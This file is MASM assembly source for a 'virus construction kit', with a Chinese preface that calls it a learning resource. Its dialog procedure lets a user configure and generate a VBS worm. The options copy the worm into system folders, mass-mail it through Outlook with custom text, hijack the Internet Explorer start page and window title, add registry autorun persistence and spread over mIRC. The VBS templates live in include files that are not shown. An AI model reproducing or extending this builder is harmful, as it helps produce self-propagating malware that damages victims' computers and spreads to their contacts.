virgen.asm

病毒制造机源码,有兴趣的朋友可以看一下

;########################################################################
;工具:radasm+masm
;radasm下载网址http://radasm.visualassembler.com/
;masm下载地址http://www.movsd.com/
;本代码仅供学习之用，不得改编成其它破坏工具
;所生成的代码是参考其他vbs病毒写成的，不经测试。作者的目的只是公开制造机的原理
;本代码适合于masm初学者学习，请参考罗云彬的《编语言程序设计》，及罗聪某一篇文章，beagle病毒
;########################################################################
.386
.model flat, stdcall  ;32 bit memory model
option casemap :none  ;case sensitive

include virgen.inc
include equfile.inc
include usefull.inc

.code

start:

	invoke GetModuleHandle,NULL
	mov		hInstance,eax

    invoke InitCommonControls
	invoke DialogBoxParam,hInstance,IDD_DIALOG1,NULL,addr DlgProc,NULL
	invoke ExitProcess,0

;########################################################################

DlgProc proc hWin:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM

	mov		eax,uMsg
	.if eax==WM_INITDIALOG
		invoke	LoadIcon,hInstance,ICO_MAIN
		invoke	SendMessage,hWin,WM_SETICON,ICO_MAIN,eax
		invoke	LoadBitmap,hInstance,BMP_MAIN
		invoke 	SendMessage,hWin,BM_SETIMAGE,BMP_MAIN,eax
		invoke	GetWindowsDirectory,addr szWindowsDirectory,MAX_PATH
		invoke 	GetSystemDirectory,addr szSystemDirectory,MAX_PATH
		
		invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText1
		invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText2
		invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_ADDSTRING,0,addr szCBOText3
		invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_SETCURSEL,0,0
		invoke	GetDlgItem,hWin,IDC_EDT_DIR
		invoke	EnableWindow,eax,FALSE
		
		invoke	GetDlgItem,hWin,IDC_EDT_KEY
		invoke	EnableWindow,eax,FALSE
		
		invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
		invoke	EnableWindow,eax,FALSE
		invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
		invoke	EnableWindow,eax,FALSE
		
		invoke	GetDlgItem,hWin,IDC_EDT_STARTPAGE
		invoke	EnableWindow,eax,FALSE
		invoke	GetDlgItem,hWin,IDC_EDT_WINTITLE
		invoke	EnableWindow,eax,FALSE

	.elseif eax==WM_COMMAND
		mov eax,wParam
		.if 	ax==IDC_NAME
				invoke GetDlgItemText,hWin,IDC_NAME,addr szBaseVirName,sizeof szVirName
				invoke lstrcpy,addr szVirName,addr szBaseVirName
				invoke lstrcat,addr szVirName, addr szVirNamePatch
		.elseif		ax==IDC_AUTHOR
				invoke GetDlgItemText,hWin,IDC_AUTHOR,addr szVirAuthor2,sizeof szVirAuthor2
		.elseif		ax==IDC_LOCA
				invoke GetDlgItemText,hWin,IDC_LOCA,addr szOrigin2,sizeof szOrigin2
		.elseif 	ax==IDC_CHK_MIRC
				invoke IsDlgButtonChecked,hWin,IDC_CHK_MIRC
				mov IsMircChecked,eax
		.elseif		ax==IDC_EDT_STARTPAGE
				invoke GetDlgItemText,hWin,IDC_EDT_STARTPAGE,addr szStartPage,sizeof szStartPage
		.elseif		ax==IDC_EDT_WINTITLE
				invoke GetDlgItemText,hWin,IDC_EDT_WINTITLE,addr szWindowTitle,sizeof szWindowTitle
		.elseif     ax==IDC_EDT_KEY
				invoke GetDlgItemText,hWin,IDC_EDT_KEY,addr szRegName,sizeof szRegName
		.elseif     ax==IDC_CHK_AUTORUN
				invoke IsDlgButtonChecked,hWin,IDC_CHK_AUTORUN
				mov IsAutorunChecked,eax
				.if IsAutorunChecked==BST_CHECKED
					invoke	GetDlgItem,hWin,IDC_EDT_KEY
					invoke	EnableWindow,eax,TRUE
				.elseif IsAutorunChecked==BST_UNCHECKED	
				 	invoke	GetDlgItem,hWin,IDC_EDT_KEY
					invoke	EnableWindow,eax,FALSE
				.endif	
				
		.elseif		ax==IDC_CHK_OUTLOOK
				invoke IsDlgButtonChecked,hWin,IDC_CHK_OUTLOOK
				mov IsLookOutChecked,eax
				.if IsLookOutChecked==BST_CHECKED
					invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
					invoke	EnableWindow,eax,TRUE
					invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
					invoke	EnableWindow,eax,TRUE
				.elseif IsLookOutChecked==BST_UNCHECKED	
					invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKSUBJECT
					invoke	EnableWindow,eax,FALSE
					invoke	GetDlgItem,hWin,IDC_EDT_OUTLOOKBODY
					invoke	EnableWindow,eax,FALSE
				.endif
		
		.elseif ax==IDC_CHK_PAYLOAD
				invoke IsDlgButtonChecked,hWin,IDC_CHK_PAYLOAD
				mov IsPayloadChecked,eax
				.if eax==BST_CHECKED
					invoke	GetDlgItem,hWin,IDC_EDT_STARTPAGE
					invoke	EnableWindow,eax,TRUE
					invoke	GetDlgItem,hWin,IDC_EDT_WINTITLE
					invoke	EnableWindow,eax,TRUE
				.elseif eax==BST_UNCHECKED	
					invoke	GetDlgItem,hWin,IDC_EDT_STARTPAGE
					invoke	EnableWindow,eax,FALSE
					invoke	GetDlgItem,hWin,IDC_EDT_WINTITLE
					invoke	EnableWindow,eax,FALSE
				.endif
				
					
		.elseif		ax==IDC_EDT_OUTLOOKSUBJECT
				invoke GetDlgItemText,hWin,IDC_EDT_OUTLOOKSUBJECT,addr szMailSubject,sizeof szMailSubject
		.elseif		ax==IDC_EDT_OUTLOOKBODY
				invoke GetDlgItemText,hWin,IDC_EDT_OUTLOOKBODY,addr szMailBody,sizeof szMailBody
		
		.elseif		ax==IDC_CBO1	
					shr eax,16
					.if	ax==CBN_SELENDOK
						invoke SendDlgItemMessage,hWin,IDC_CBO1,CB_GETCURSEL,0,0
						.if eax==0
							invoke GetDlgItem,hWin,IDC_EDT_DIR
							invoke EnableWindow,eax,FALSE
							mov IsDir,0
						.elseif eax==1
							invoke GetDlgItem,hWin,IDC_EDT_DIR
							invoke EnableWindow,eax,FALSE
							mov IsDir,1
						.elseif eax==2
							invoke GetDlgItem,hWin,IDC_EDT_DIR
							invoke EnableWindow,eax,TRUE
							mov IsDir,2
						.endif	
					.endif
		
		
		.elseif ax==IDC_BTN_MAKE
				invoke GetProcessHeap
				mov hHeap,eax
				invoke HeapAlloc, hHeap, NULL,8*MAX_PATH+10000
				mov lpOriMen,eax
				mov lpMen,eax
				add lpMen,1000h ;注意,此句的作用是避免生成的文件头部出现乱码
				
				;BaseInfor
				invoke lstrcat, lpMen, addr szBaseInfor
				invoke lstrcat, lpMen, addr szBaseVirName
				invoke lstrcat, lpMen, addr	szVirAuthor1
				invoke lstrcat, lpMen, addr	szVirAuthor2
				invoke lstrcat, lpMen, addr	szOrigin1
				invoke lstrcat, lpMen, addr szOrigin2
				invoke lstrcat, lpMen, addr szBegin
				
				;建立自定义文件夹
				cmp IsDir,2
				jnz @F
				invoke GetDlgItemText,hWin,IDC_EDT_DIR,addr szNewVirPath,sizeof szNewVirPath
				invoke lstrlen,addr szNewVirPath
				
				;处理szNewVirPath，使路径最后面总是不含\
				push edx
				mov edx,offset szNewVirPath
				add edx,eax
				mov al,byte ptr [edx-1]
				cmp al,92
				jnz @Not
				mov byte ptr [edx-1],00h
				pop ebx
				@Not:
				
				;invoke CreateDirectory,addr szNewVirPath,NULL v1.2 更正此处逻辑错误，若无用户自定义的文件夹，应由vbs代码来创建
				@@:
				
				;CopyToDirectory
				cmp IsDir,0
				jnz @F
				invoke lstrcat, lpMen, addr szCopyToSystem
				invoke lstrcat, lpMen, addr szVirName
				invoke lstrcat, lpMen, addr szVbsSym4
				@@:
				cmp IsDir,1
				jnz @F
				invoke lstrcat, lpMen, addr szCopyToWindows
				invoke lstrcat, lpMen, addr szVirName
				invoke lstrcat, lpMen, addr szVbsSym4
				@@:
				cmp IsDir,2
				jnz @F
				invoke lstrcat, lpMen, addr szCopyToDefinePath
				invoke lstrcat, lpMen, addr szVbsSym
				invoke lstrcat, lpMen, addr szNewVirPath
				invoke lstrcat, lpMen, addr szVbsSym1
				invoke lstrcat, lpMen, addr szVirName
				invoke lstrcat, lpMen, addr szVbsSym
				@@:
				
				;OutLook
				cmp IsLookOutChecked,BST_CHECKED
				jnz @OutLookOut
				invoke lstrcat, lpMen, addr szOutLook1
				invoke lstrcat, lpMen, addr szMailSubject
				invoke lstrcat, lpMen, addr szOutLook2
				invoke lstrcat, lpMen, addr szOutLook3
				invoke lstrcat, lpMen, addr szMailBody
				invoke lstrcat, lpMen, addr szOutLook4
				invoke lstrcat, lpMen, addr szOutLook5
					cmp IsDir,0
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szSystemDirectory
					@@:
					cmp IsDir,1
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szWindowsDirectory
					@@:
					cmp IsDir,2 
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szNewVirPath
					@@:
					invoke lstrcat, lpMen, addr szVbsSym1
					invoke lstrcat, lpMen, addr szVirName
					invoke lstrcat, lpMen, addr szVbsSym
					
					invoke lstrcat, lpMen, addr szOutLook6
				@OutLookOut:
				
				
				
				;IE,playload
				cmp IsPayloadChecked,BST_CHECKED
				jnz @F
				invoke lstrcat, lpMen, addr szRegStartPage
				invoke lstrcat, lpMen, addr szStartPage
				invoke lstrcat, lpMen, addr szRegStartPage2
				invoke lstrcat, lpMen, addr szRegWindowTitle
				invoke lstrcat, lpMen, addr szWindowTitle 
				invoke lstrcat, lpMen, addr szRegWindowTitle2
				@@:
				
				;AutoRen
				cmp IsAutorunChecked,BST_CHECKED
				jnz @RegOut
				invoke lstrcat, lpMen, addr szRegAutoRun1
				invoke lstrcat, lpMen, addr szRegName
				invoke lstrcat, lpMen, addr szVbsSym
				invoke lstrcat, lpMen, addr szVbsSym2
					cmp IsDir,0
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szSystemDirectory
					@@:
					cmp IsDir,1
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szWindowsDirectory
					@@:
					cmp IsDir,2
					jnz @F
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szNewVirPath
					@@:
					invoke lstrcat, lpMen, addr szVbsSym1
					invoke lstrcat, lpMen, addr szVirName
					invoke lstrcat, lpMen, addr szVbsSym
				@RegOut:
				
				
				
				
				;Mirc
				cmp IsMircChecked,BST_CHECKED
				jnz @MircOut
				invoke lstrcat, lpMen, addr szMirc1
					cmp IsDir,0
					jnz @F
					invoke lstrcat, lpMen, addr szSystemDirectory
					@@:
					cmp IsDir,1
					jnz @F
					invoke lstrcat, lpMen, addr szWindowsDirectory
					@@:
					cmp IsDir,2
					jnz @F
					invoke lstrcat, lpMen, addr szNewVirPath
					@@:
					invoke lstrcat, lpMen, addr szVbsSym1
					invoke lstrcat, lpMen, addr szVirName
					invoke lstrcat, lpMen, addr szVbsSym
					invoke lstrcat, lpMen, addr szMirc2
				@MircOut:
				
				
				invoke lstrcat, lpMen, addr szEnd
				invoke lstrlen, lpMen
				mov len, eax
				invoke CreateFile,addr szVirName,GENERIC_WRITE ,0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL
				mov hFile,eax
				invoke WriteFile,hFile,lpMen,len,addr nWrite,NULL
				invoke CloseHandle,hFile
				invoke HeapFree,hHeap,NULL,lpOriMen
				invoke Sleep,500
				invoke MessageBox,NULL,addr szText,addr szCaption,MB_ICONINFORMATION+MB_OK
		.endif

	.elseif eax==WM_CLOSE
		invoke EndDialog,hWin,0
	.else
		mov		eax,FALSE
		ret
	.endif
	mov		eax,TRUE
	ret

DlgProc endp

end start